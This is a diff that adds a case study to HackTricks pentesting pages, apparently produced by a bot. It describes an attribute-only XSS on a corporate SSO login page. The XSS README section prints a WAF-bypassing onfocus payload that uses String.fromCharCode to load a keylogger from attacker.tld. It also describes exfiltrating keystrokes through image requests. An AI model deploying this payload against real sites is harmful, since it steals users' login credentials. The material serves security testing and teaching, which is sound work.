Add content from: Turning a harmless XSS behind a WAF into a realistic phishin...

Author: HackTricks News Bot

src/pentesting-web/account-takeover.md

@@ -63,6 +63,8 @@ If you find a XSS in application you might be able to steal cookies, local stora
 xss-cross-site-scripting/
 {{#endref}}
 
+- Attribute-only reflected payloads on login pages can hook `document.onkeypress`, exfiltrate keystrokes through `new Image().src`, and steal credentials without submitting the form. See [Attribute-only login XSS behind WAFs](xss-cross-site-scripting/README.md#attribute-only-login-xss-behind-wafs) for a practical workflow.
+
 ## **Same Origin + Cookies**
 
 If you find a limited XSS or a subdomain take over, you could play with the cookies (fixating them for example) to try to compromise the victim account:
@@ -151,6 +153,7 @@ With the new login, although different cookies might be generated the old ones b
 
 ## References
 
+- [https://blog.hackcommander.com/posts/2025/12/28/turning-a-harmless-xss-behind-a-waf-into-a-realistic-phishing-vector/](https://blog.hackcommander.com/posts/2025/12/28/turning-a-harmless-xss-behind-a-waf-into-a-realistic-phishing-vector/)
 - [https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050](https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050)
 - [https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea)
 - [0xdf – HTB Era: security-question IDOR & username oracle](https://0xdf.gitlab.io/2025/11/29/htb-era.html)

src/pentesting-web/proxy-waf-protections-bypass.md

@@ -192,6 +192,10 @@ It's also mentioned that depending on **how some WAFs understand the context** o
 
 These kind of context problems can also be used to **abuse other vulnerabilities than the one expected** to be exploited by the WAF (e.g. this could also be used to exploit a XSS).
 
+### Inline JavaScript first-statement inspection gaps
+
+Some inline-inspection rulesets only parse the first JavaScript statement present inside an event handler. By prefixing a harmless-looking expression in parentheses followed by a semicolon (for example `onfocus="(history.length);payload"`), the malicious code placed after the semicolon bypasses inspection while the browser still executes it. Combining this with fragment-induced focus (e.g., appending `#forgot_btn` so the targeted element is focused on load) allows click-less XSS that can immediately call `$.getScript` and bootstrap phishing tooling such as keyloggers. See the [attribute-only login XSS case study](xss-cross-site-scripting/README.md#attribute-only-login-xss-behind-wafs) derived from [this research](https://blog.hackcommander.com/posts/2025/12/28/turning-a-harmless-xss-behind-a-waf-into-a-realistic-phishing-vector/).
+
 ### H2C Smuggling <a href="#ip-rotation" id="ip-rotation"></a>
 
 
@@ -238,6 +242,7 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri
 
 ## References
 
+- [https://blog.hackcommander.com/posts/2025/12/28/turning-a-harmless-xss-behind-a-waf-into-a-realistic-phishing-vector/](https://blog.hackcommander.com/posts/2025/12/28/turning-a-harmless-xss-behind-a-waf-into-a-realistic-phishing-vector/)
 - [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
 - [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
 - [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g)

src/pentesting-web/xss-cross-site-scripting/README.md

@@ -62,6 +62,35 @@ If your input is reflected inside the value of the attribute of a tag you could
 3. If you **cannot escape from the attribute** (`"` is being encoded or deleted), then depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked. Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
 4. If your input is reflected inside "**unexpoitable tags**" you could try the **`accesskey`** trick to abuse the vuln (you will need some kind of social engineer to exploit this): **`" accesskey="x" onclick="alert(1)" x="`**
 
+#### Attribute-only login XSS behind WAFs
+
+A corporate SSO login page reflected the OAuth `service` parameter inside the `href` attribute of `<a id="forgot_btn" ...>`. Even though `<` and `>` were HTML-encoded, double quotes were not, so the attacker could close the attribute and reuse the same element to inject handlers such as `" onfocus="payload" x="`.
+
+1. **Inject the handler:** Simple payloads like `onclick="print(1)"` were blocked, but the WAF only inspected the first JavaScript statement in inline attributes. Prefixing a harmless expression wrapped in parentheses, then a semicolon, allowed the real payload to execute: `onfocus="(history.length);malicious_code_here"`.
+2. **Auto-trigger it:** Browsers focus any element whose `id` matches the fragment, so appending `#forgot_btn` to the exploit URL forces the anchor to focus on page load and runs the handler without requiring a click.
+3. **Keep the inline stub tiny:** The target already shipped jQuery. The handler only needed to bootstrap a request via `$.getScript(...)` while the full keylogger lived on the attacker's server.
+
+**Building strings without quotes**
+
+Single quotes were returned URL-encoded and escaped double quotes corrupted the attribute, so the payload generated every string with `String.fromCharCode`. A helper function makes it easy to convert any URL into char codes before pasting it into the attribute:
+
+```javascript
+function toCharCodes(str){
+  return `const url = String.fromCharCode(${[...str].map(c => c.charCodeAt(0)).join(',')});`
+}
+console.log(toCharCodes('https://attacker.tld/keylogger.js'))
+```
+
+A resulting attribute looked like:
+
+```html
+onfocus="(history.length);const url=String.fromCharCode(104,116,116,112,115,58,47,47,97,116,116,97,99,107,101,114,46,116,108,100,47,107,101,121,108,111,103,103,101,114,46,106,115);$.getScript(url),function(){}"
+```
+
+**Why this steals credentials**
+
+The external script (loaded from an attacker-controlled host or Burp Collaborator) hooked `document.onkeypress`, buffered keystrokes, and every second issued `new Image().src = collaborator_url + keys`. Because the XSS only fires for unauthenticated users, the sensitive action is the login form itself—the attacker keylogs usernames and passwords even if the victim never presses "Login".
+
 Weird example of Angular executing XSS if you controls a class name:
 
 ```html
@@ -1972,6 +2001,7 @@ other-js-tricks.md
 
 ## References
 
+- [Turning a harmless XSS behind a WAF into a realistic phishing vector](https://blog.hackcommander.com/posts/2025/12/28/turning-a-harmless-xss-behind-a-waf-into-a-realistic-phishing-vector/)
 - [XSS and SSRF via the List-Unsubscribe SMTP Header in Horde Webmail and Nextcloud Mail](https://security.lauritz-holtmann.de/post/xss-ssrf-list-unsubscribe/)
 - [HackerOne Report #2902856 - Nextcloud Mail List-Unsubscribe SSRF](https://hackerone.com/reports/2902856)
 - [From "Low-Impact" RXSS to Credential Stealer: A JS-in-JS Walkthrough](https://r3verii.github.io/bugbounty/2025/08/25/rxss-credential-stealer.html)